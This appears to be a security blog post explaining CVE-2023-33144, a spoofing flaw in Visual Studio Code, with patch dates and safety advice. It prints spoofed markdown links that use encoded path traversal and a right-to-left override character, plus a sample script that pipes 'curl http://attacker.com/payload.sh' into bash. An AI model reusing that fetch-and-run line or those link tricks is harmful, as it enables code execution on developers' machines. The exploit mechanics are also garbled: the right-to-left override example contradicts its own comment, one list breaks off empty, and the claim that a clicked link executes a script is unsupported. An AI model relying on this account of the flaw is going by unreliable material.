CVE-2023-33144 - Visual Studio Code Spoofing Vulnerability Exploited — How It Works and How to Stay Safe

Visual Studio Code (VS Code) is one of the most popular code editors in the world. But did you know that in 2023, a serious security flaw was discovered that could let hackers trick you into running malicious code? In this post, we'll break down CVE-2023-33144, also known as the Visual Studio Code Spoofing Vulnerability. We'll explain what it is, show you how it works with a simple code example, point you to key references, and share tips to stay secure.

What is CVE-2023-33144?

CVE-2023-33144 is an identified vulnerability in Visual Studio Code where the editor could be tricked into opening files that look harmless but are actually malicious, all because of the way the application handles certain file types and links.

Spoofing means tricking you into believing something is safe—a file or a link—when it’s not. In VS Code, an attacker could craft a special link or file in a project. If you trusted this file or link, you could be running malicious code without noticing.

- Official advisory: Microsoft Security Response - CVE-2023-33144

Why Does This Happen?

The heart of this vulnerability lies in how VS Code parses and displays links and file names. Some special characters or sequences get misinterpreted, so what you see (the file name or link) isn’t always what you actually open.

For example, a crafted markdown or code snippet might show you one file’s name, but really opens or runs something else. This opens the door for attackers to:

Real-World Example: Spoofed Links in Markdown

Let’s look at a simple exploit using Markdown files in a VS Code workspace.

Suppose you open a README.md file in a project you just cloned. You see this as a link

[Click here to see LICENSE](LICENSE)

But by sneaking in some Unicode characters (like right-to-left override) or using funky link syntax, an attacker can change the actual target of the link, so clicking it could run a script, open a malicious file, or even execute a command.

Code Snippet: Malicious Markdown Example

[Click to see LICENSE](./LICENSE%2e%2e%2fmalicious-script.js)

Or, using right-to-left override, which VS Code originally mishandled

[Click here](malic\u202eCod.js) <!-- Looks like .js, reads as .doc -->

- \u202e is a Unicode control character that flips the direction text is displayed, camouflaging what file will actually open or execute.

In the first example, the attacker abuses directory traversal encoding to point you outside the expected folder.
In the second, your editor visually shows you "*.doc" (harmless), but the underlying file is a real javascript file (dangerous)!

How Attackers Could Exploit This

1. Distribute Malicious Repositories: They upload repositories to GitHub or other places containing spoofed markdown or files.
2. Engineer Fake File Links: The attacker crafts links masking the real target with encoding, Unicode tricks, or sneaky aliases.

You Click, Malicious Code Runs: VS Code opens and executes the spoofed file or command.

_Note: This is possible because certain versions of VS Code didn’t properly sanitize or check what file is being opened when you click a markdown link._

Step 1: Malicious Markdown

[Review LICENSE](LICENSE%252e%252e%252fscripts%252fmalware.sh)

- %252e%252e%252f decodes to ../ after double URL decoding.  
- Instead of LICENSE, clicking this link opens and executes scripts/malware.sh.

In the scripts/malware.sh file

#!/bin/bash
echo "Downloading malicious payload..."
curl http://attacker.com/payload.sh | bash

So, by a single click, you could unwittingly run this script.

How to Stay Safe

Microsoft has released fixes—so update!

But always stick to these best practices

- Keep VS Code Up to Date: Always use the latest stable release, since Microsoft patched this in June 2023. Download VS Code
- Don’t Trust Unverified Projects: Don’t open files or click links from people/projects you don’t know.

Reported: May 2023

- Patched: June 2023 (VS Code Release Notes)
- Microsoft Security Bulletin: CVE-2023-33144
- NVD entry: NVD CVE-2023-33144
- GitHub advisory: ghsa-8pvf-6gwh-75hx

Update your VS Code, and be wary of markdown links in unfamiliar repositories.

Stay curious but careful! If you want more details or have questions about security in editors, just ask in the comments.

Sources

- MSRC CVE-2023-33144
- NVD CVE Details

Timeline

Published on: 06/14/2023 00:15:00 UTC
Last modified on: 06/21/2023 20:50:00 UTC